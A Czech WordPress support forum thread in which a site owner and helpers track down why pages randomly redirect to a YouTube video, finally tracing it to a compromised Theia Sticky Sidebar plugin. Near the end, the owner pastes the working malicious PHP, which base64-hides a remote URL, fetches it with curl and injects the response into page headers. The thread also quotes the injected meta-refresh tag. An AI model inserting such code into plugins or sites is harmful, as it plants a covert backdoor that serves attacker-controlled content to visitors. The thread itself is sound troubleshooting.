Úvodní stránka › Fórum podpory WordPressu › Problémy s WordPressem › Náhodné přesměrování na youtube
Štítky: Hack, Meta tag, Theia Sticky Sidebar
Zvolené téma obsahuje celkem 23 odpovědí. Do diskuze (3 účastníci) se naposledy zapojil uživatel n3s4 a poslední změna je stará 9 let, 8 měsíců.
-
AutorPříspěvky
-
20. května 2014 (19:31) #18720
Zdravím, psalo mi hodně lidí, že na našem webu se stává, že po kliknutí na nějaký – pokaždé náhodně jiný odkaz se stránka přesměruje na youtube video s justinem biebrem :/
Může být web nějak napaden? Zkoušel jsem stránky procházet a po kliknutí na odkaz se někdy stránky opravdu přesměrují. Poradí někdo?
Web je: http://www.sportovni-kynologie.cz/
WordPress: teď nevím jakou přesně verzi máme20. května 2014 (22:13) #18728Tak na uvedený web se ani nedostanu, protože jsem rovnou přesměrován na Youtube :-) Patrně došlo k nějakému napadení nebo nekorektnímu chování nějakého pluginu. Zkuste prozkoumat soubory na FTP, třeba si všimnete nějaké úpravy. Dále je třeba deaktivovat pluginy a nasadit výchozí šablonu Twenty Fourteen. Pokud problém stále přetrvává, tak byly patrně napadeny přímo jádrové soubory WordPressu. Ještě než celý WordPress aktualizujete, tak by bylo zajímavé zjistit, co to bylo za útočníka, jak se na web dostal a co tam vlastně provedl…
21. května 2014 (13:37) #18739Dobrý den,
podle zdrojáku máte infekci v hlavičce
<meta http-equiv="refresh" content="0; url=https://www.youtube.com/watch?v=RFngSCaY5nA"/><style type="text/css">
Našel jsem, že to řešili tady.
21. května 2014 (14:14) #18742weskomfort: Pěkné, díky! Teď už zbývá jen zjistit, jak se to tam dostalo a kde je ten kód konkrétně umístěn. Ale to už bude muset udělat Lukas :-)
21. května 2014 (20:05) #18744Zdravím, díky za rady, ale ve zdrojáku na webu nikde toto přesměrování nevidím.. Zkouším prohledat pluginy, jestli to není někde u nich…
21. května 2014 (20:36) #18745Tak už jsem toto přesměrování v kódu našel, ale zjistil jsem, že se objevuje nějak náhodně, nikoliv pokaždé.
Abych pravdu řekl, dle FTP nepoznám změny, jelikož aktualizuji pluginy a tím pádem je téměř vše upravované… Navíc se mi nějak moc nechce deaktivovat plugin po pluginu abych to zjistil, který to případně způsobuje… nechtěl bych přijít o nastavení apod u pluginu…
21. května 2014 (21:39) #18746Nevím co jste přesně hledal za kód, ale zkuste třeba pomocí PSPadu prohledat soubory pluginů na výskyt adres uvedených ve článku na který jsem dával odkaz.
To znamenáhttp://spamcheckr.com/l.php
nebohttp://spamcheckr.com/req.php
případněspamcheckr.com
protože může mít určitě i jiné modifikace.21. května 2014 (23:06) #18748Zkoušel jsem prohledat celý stažený web pomocí FileSeek a našel jsem ono přesměrování
<meta http-equiv="refresh" content="0; url=https://www.youtube.com/watch?v=RFngSCaY5nA"/>
jen ve dvou statických souborech v cache adresáři od pluginu WP Super Cache. Takže jsem tento řádek smazal a vyčistil cache. Nyní již problém není.Jen netuším, jak se to tam mohlo dostat, když žádný jiný soubor tento kód neobsahoval. Ale mělo by to být vyřešené, uvidím, zda se mi to ještě stane či zda někdo z návštěvníků opět napíše o této chybě.
24. května 2014 (17:27) #18789Do cachovaných souborů se to dostalo patrně tak, že byl web napaden, ale nějakou aktualizací (pluginu či šablony) jste problém odstranil. Zůstal tak pouze na některých cachovaných stránkách. Pokud šlo o nějakou bezpečnostní chybu v pluginu/šabloně, která byla aktualizací odstraněna, tak můžete mít vyhráno. Pokud ale mají útočníci hesla k FTP či databázi, tak se může problém zase brzy objevit.
Doporučení: Změnil bych raději hesla (FTP, databáze) a prohledal bych kromě souborů i obsah databáze.
1. června 2014 (21:05) #18958Zatím se to již nestalo. Mohu nějak zjistit, kdy byl například přístup do databáze a na ftp? Jsme u wedosu a tam asi nemají nějaký log..?
1. června 2014 (21:28) #18959Mohlo to zmizet třeba po nějaké aktualizaci. Přístupy do databáze se budou identifikovat špatně (samotný WordPress k ní přistupuje např. při každém zobrazení stránky) a pokud má někdo přístupy k FTP, tak se bude také špatně dohledávat, protože se bude robot hlásit pod stejným uživatelem (ale asi by to šlo odfiltrovat pomocí IP adresy). Na podrobnosti se ale budete muset zeptat přímo na podpoře. Používáte klasický hosting nebo VPS?
Podobné téma se řešilo i zde. Je tam i tip na plugin, který umí sledovat soubory na FTP a pošle notifikační email při každé změně.
29. června 2014 (11:54) #19379Tak se to stále děje. Web se mi náhodně přesměrovává na youtube s Justinem Biebrem :/ Nevím, čím to je. Zkoušel jsem vše, nic se nevyřešilo. WordPress mám v nejnovější verzi, netuším, čím to může být?
Změnil jsem přístupy na FTP a stále se to stává. Máte někdo tušení, jak zjistit, čím to je? Zkoušel jsem prohledat veškeré pluginy, celý web a nikde jsem dané fráze: http://spamcheckr.com/l.php nebo http://spamcheckr.com/req.php případně spamcheckr.com, <meta http-equiv=”refresh” content=”0; url=https://www.youtube.com/watch?v=RFngSCaY5nA”/> nenašel. Nevím si vůbec rady.
29. června 2014 (12:05) #19380Přesně stejný problém se řešil zde, ale nevím, když já nikde hledané kódy nenašel napříč celým webem…
29. června 2014 (13:50) #19383Co to znamená náhodně? Zkoušel jsem projít pár stránek na webu a nikam jsem přesměrován nebyl? Odkaz na youtube může být klidně šifrovaný a načítán z nějakého souboru pluginu. Zkuste prozkoumat FTP, zda nebyl v poslední době změněn např. nějaký soubor…
29. června 2014 (13:55) #19384No náhodně myslím, jako že jednou se nějaká stránka přesměruje a napodruhé už nikoliv, řešili to v těch diskuzích viz odkazy..
Raději jsem smazal plugin WP Super Cache -, přesměrování
<meta http-equiv="refresh" content="0; url=https://www.youtube.com/watch?v=RFngSCaY5nA"/>
bylo vždy v cache ve statických html souborech.29. června 2014 (13:58) #19385Tak jsem to zkoušel taky a opravdu, pokud jednu stránku nechám několikrát načíst tak někdy se přesměruje. Napadá mě zkusit vypnout plugin na reklamy, protože to je asi jediné co se mění při každém načtení.
Jinak opravdu nejste sám, ale vždy pomohlo najít škodlivý kód v pluginu, jako třeba zde nebo zde.29. června 2014 (14:01) #19386Jaký plugin na reklamy? Já programem fileseek procházel komplet celý stažený web a našel to pouze ve statických souborech v cache adresáři, nikde jinde…
29. června 2014 (14:09) #19387Nejspíše vyřešeno, děkuji :) Infiltrace byla v pluginu Theia sticky sidebar:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_chesk() {if(function_exists('curl_init')) {$addressd=base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw");$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_chesk');}}?>
proto mi infiltraci FileSeek nenašel, URL spamcheckr.com/check.php byla zakódovaná… Až tento odkaz mi pomohl :)
29. června 2014 (14:22) #19390Omlouvám se za špatný popis pluginu na reklamy. Byl jsem lenošný zjišťovat co je to za plugin :) . Ve Vašem případě to byl samozřejmě Theia sticky sidebar.
30. června 2014 (11:05) #19409Které klíčové slovo jste nakonec hledal? Oblíbená je např. funkce base64_decode(). Původně jsem myslel, že byl v cache uložen pouze pozůstatek napadení a web už byl vyčištěn, ale evidentně nikoli. Našel jste tak poprvé pouze důsledek (vložený HTML kód do cachovaných souborů), ale nezjistil příčinu (šifrovaný kód v .php souboru).
Plugin Theia Sticky Sidebar je placený a jen mě napadá, zda jste zakoupil oficiální licenci nebo jste si nákazu přinesl z nějaké pirátské verze?
-
AutorPříspěvky
Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.